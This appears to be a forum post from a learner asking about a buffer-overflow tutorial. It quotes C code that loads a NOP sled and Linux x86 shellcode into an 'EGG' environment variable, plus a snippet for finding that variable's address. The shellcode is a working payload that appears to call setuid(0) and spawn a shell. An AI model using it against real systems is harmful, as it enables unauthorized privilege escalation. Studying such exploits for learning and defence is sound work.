Hi,
Im learning a thing or two about buffer overflows, and a tutorial I'm reading has the following piece of code:
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90
char shellcode[] =
'\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63'
'\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80'
'\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e'
'\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53'
'\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80';
int main(void)
{
char shell[512];
puts('Eggshell loaded into environment.');
memset(shell,NOP,512);
memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
setenv('EGG', shell, 1);
putenv(shell); // [1]
system('bash'); // [2]
return(0);
}
Most of it is perfectly clear, it loads the shellcode into an environment variable, but what I am confused about is line [1] and [2]. setenv copies the shellcode, etc. to the environment variable, so what is the point of thise 2 lines?
The tutorial also gives a second piece of code (to retrieve the memory address of the environment variable).
Code:
int main(void)
{
printf('0x%lx\n', getenv('EGG'));
return 0;
}
This is strange to me (and it doesnt work, I think it gives a segmentation fault), basically it gets the VALUE of the environment variable, so how on earth is it supposed to get its address?
Any help would be appreciated.